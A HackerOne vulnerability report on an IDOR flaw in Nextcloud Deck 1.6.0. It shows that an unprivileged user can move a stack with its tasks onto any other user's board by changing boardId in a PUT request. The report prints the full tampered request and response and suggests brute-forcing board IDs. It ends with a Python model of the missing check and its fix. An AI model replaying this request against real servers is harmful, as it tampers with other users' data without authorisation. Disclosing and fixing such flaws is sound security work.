hackerone supr4s H1:1450117
Jan 14, 2022 - 11:58 p.m.
Nextcloud: Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board

2022-01-14 23:58:19
supr4s
hackerone.com

EPSS: 0.001 (Low), Percentile: 27.1%

Hi everyone,

Hope you are well!

I found an IDOR vulnerability allowing any user without privilege to add lists with tasks on any user's board.
This was tested on a Nextcloud Hub II server (v23) with the Deck application in version 1.6.0.

Steps To Reproduce:

Beforehand:

  • Have a user A with a board ID specific to that user (boardId parameter)
  • Have a user B with a board ID specific to that user (boardId parameter)
  • Note that there is no link between user A and user B

1°) With your user A, rename an existing list belonging to him.

The following PUT request is made:

PUT /apps/deck/stacks/31 HTTP/1.1
Host: nextcloud.yourserver.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken: <token>
Content-Length: 136
Origin: https://nextcloud.yourserver.com
Connection: close
Cookie: <your_session_cookies>

{"title":"IDOR","boardId":14,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"} 

Intercept the request, change the boardId parameter to that of your victim (user B) and replay the modified request.

Check the server response that confirms the vulnerability:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 23:39:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 135
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'
Feature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'
X-Robots-Tag: none
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Strict-Transport-Security: max-age=31536000; includeSubDomains;

{"title":"IDOR_REPORT","boardId":1,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"}

2°) With your user B, go to the board in question and notice that a new list with tasks has been added without his knowledge.

Additional Notes:

  • This works from one user without privilege to another
  • It works from an unprivileged user on the board of an administrator/privileged user
  • If this vulnerability is exploited with a list containing several tasks, each containing images, labels, calendar etc., everything is imported to the victim’s account
  • If our victim deletes the list created without his knowledge, it also deletes it on the attacker’s side

Impact

Broken Access Control - IDOR: The impact here is being able to add lists with tasks on the board of any user and harm them.
We could imagine here brute-forcing the boardId parameter starting from 1 to 1000 (for example) to exploit this vulnerability on all the existing users/tables. We could also create an incalculable number of lists on our victim's board.

Looking forward to exchanging.

Regards,
Supras
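The access-control gap described in the steps above, modelled in Python as an added example that is not Nextcloud Deck's code: the handler authorises the stack's current board but not the board named in the request body, and the fix is the second check on the destination board. Board, stack and user names are constructed; the permission name is an assumption.

```python
# Added example, not Nextcloud Deck's code: a model of the PUT /apps/deck/stacks/{id}
# handler with the missing target-board check. Data is constructed, names assumed.
from dataclasses import dataclass, field

PERMISSION_EDIT = "edit"

@dataclass
class Board:
    id: int
    owner: str
    shared: dict = field(default_factory=dict)  # user -> set of permissions

    def can(self, user: str, perm: str) -> bool:
        return user == self.owner or perm in self.shared.get(user, set())

@dataclass
class Stack:
    id: int
    board_id: int
    title: str

class Forbidden(Exception):
    pass

def update_stack(user, stack_id, body, stacks, boards, check_target=True):
    # check_target=False mirrors the reported behaviour: only the stack's
    # current board is authorised, so any boardId in the body is accepted.
    stack = stacks[stack_id]
    if not boards[stack.board_id].can(user, PERMISSION_EDIT):
        raise Forbidden("no edit permission on the stack's current board")
    target = boards.get(body["boardId"])
    if target is None:
        raise Forbidden("target board does not exist")
    # The fix: the caller must also hold edit rights on the destination board.
    if check_target and not target.can(user, PERMISSION_EDIT):
        raise Forbidden("no edit permission on the target board")
    stack.board_id = target.id
    stack.title = body["title"]
    return stack

def run_scenario(check_target: bool) -> str:
    # Replays the report: A owns board 14 (with stack 31), B owns unshared board 1.
    boards = {14: Board(14, "userA"), 1: Board(1, "userB")}
    stacks = {31: Stack(31, 14, "old name")}
    body = {"title": "IDOR", "boardId": 1, "id": 31}
    try:
        update_stack("userA", 31, body, stacks, boards, check_target)
    except Forbidden as exc:
        return f"403 {exc}; stack 31 on board {stacks[31].board_id}"
    return f"200 OK; stack 31 on board {stacks[31].board_id}"
```

With the check in place the move is refused and stack 31 stays on board 14; a user B has actually shared with edit rights would still be allowed through.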
